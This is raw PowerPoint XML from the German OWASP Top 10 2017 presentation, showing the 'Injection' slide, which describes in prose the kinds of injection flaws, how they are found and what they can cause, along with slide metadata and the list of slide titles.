            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="34" name="Tabelle 1"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3893511475"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="10800" y="939600"/>
          <a:ext cx="6836272" cy="22441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472">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900" b="1" err="1">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Ausnutzbarkeit</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>:</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="500" b="1">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="105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050" b="1">
                        <a:solidFill>
                          <a:srgbClr val="FEFFFF"/>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err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Verbreitung</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="105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0" baseline="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err="1">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Auffindbarkeit</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="105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kern="1200" baseline="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>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err="1">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Technisch</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="105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baseline="0">
                        <a:solidFill>
                          <a:schemeClr val="bg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0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Beinahe jede Datenquelle kann einen Vektor für </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Injection</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> darstellen: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Umge-bungsvariablen</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, Parameter, externe und interne Webservices können von jedem Nutzer, unabhängig von seiner jeweiligen Rolle, ausgenutzt werden.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0" err="1">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId23"/>
                        </a:rPr>
                        <a:t>Injection</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId23"/>
                        </a:rPr>
                        <a:t>-Schwachstellen</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> treten dann auf, wenn ein Angreifer</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> bösartige </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Daten an</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> einen Interpreter zur</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> Verarbeitung </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>schicken</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>kann.</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de-DE" sz="900" dirty="0" err="1">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Injection</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> Schwachstellen sind weit verbreitet, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>insbe</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>-sondere in altem, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>ungewarteten</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> Legacy-Code</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>. Oft findet man sie in SQL-, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>NoSQL</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>-, ORM-, LDAP- oder </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Xpath-Querys</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, ebenso bei Betriebssystem-Kommandos („OS Command </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Injection</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>“), in XML- Parsern, SMTP-Headern und Expression </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Languages</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-DE" sz="900" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Injection</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>-Schwachstellen sind durch das Prüfen des Quellcodes leicht zu finden. Schwachstellen-Scanner und </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Fuzzer</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> können</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> Angreifer beim Auffinden von </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" baseline="0" dirty="0" err="1">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Injection</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>-Schwachstellen unterstützen.</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-DE"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de-DE" sz="900" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Injection</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> kann zu Datenverlust, </a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="de-DE" sz="900" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>-verfälschung, oder Offenlegung gegenüber </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>unauthorisierten</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> Dritten, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Verlust</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> der </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Zurechenbarkeit oder</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="de-DE" sz="900" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Zugangssperre führen. Unter Um-ständen kann es zu einer </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>vollständi</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>-gen Systemübernahme kommen. </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Die Auswirkungen auf das Unter-nehmen hängen vom Schutzbedarf der Anwendung und ihrer Daten ab.</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2.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4.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3/02/2010" val="LastModified"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag4.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="04/19/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3/02/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12399</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>A4-Papier (210 x 297 mm)</PresentationFormat>
  <Paragraphs>1305</Paragraphs>
  <Slides>26</Slides>
  <Notes>25</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26</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="34" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Exo 2</vt:lpstr>
      <vt:lpstr>Liberation Sans</vt:lpstr>
      <vt:lpstr>OpenSymbol</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Wingdings 2</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>PowerPoint-Präsentation</vt:lpstr>
      <vt:lpstr>Inhalt</vt:lpstr>
      <vt:lpstr>Vorwort der deutschen Version</vt:lpstr>
      <vt:lpstr>Vorwort</vt:lpstr>
      <vt:lpstr>Einleitung</vt:lpstr>
      <vt:lpstr>Neuerungen</vt:lpstr>
      <vt:lpstr>Sicherheitsrisiken für Anwendungen</vt:lpstr>
      <vt:lpstr>OWASP Top 10 Risiken für die Anwendungssicherheit – 2017</vt:lpstr>
      <vt:lpstr>Injection</vt:lpstr>
      <vt:lpstr>Fehler in der Authentifizierung</vt:lpstr>
      <vt:lpstr>Verlust der Vertraulichkeit sensibler Daten</vt:lpstr>
      <vt:lpstr>XML External Entities (XXE)</vt:lpstr>
      <vt:lpstr>Fehler in der Zugriffskontrolle</vt:lpstr>
      <vt:lpstr>Sicherheitsrelevante Fehlkonfiguration</vt:lpstr>
      <vt:lpstr>Cross-Site Scripting (XSS)</vt:lpstr>
      <vt:lpstr>Unsichere Deserialisierung</vt:lpstr>
      <vt:lpstr>Nutzung von Komponenten mit bekannten Schwachstellen</vt:lpstr>
      <vt:lpstr>Unzureichendes Logging &amp; Monitoring</vt:lpstr>
      <vt:lpstr>Nächste Schritte für  Software-Entwickler</vt:lpstr>
      <vt:lpstr>Nächste Schritte für Sicherheitstester</vt:lpstr>
      <vt:lpstr>Nächste Schritte für Organisationen</vt:lpstr>
      <vt:lpstr>Nächste Schritte für Anwendungs-Verantwortliche</vt:lpstr>
      <vt:lpstr>Anmerkungen zum Risikobegriff</vt:lpstr>
      <vt:lpstr>Details zu den Risiko-Faktoren</vt:lpstr>
      <vt:lpstr>Methodik und Daten</vt:lpstr>
      <vt:lpstr>Danksagung</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company>OWASP German Chapter</Company>
  <LinksUpToDate>false</LinksUpToDate>
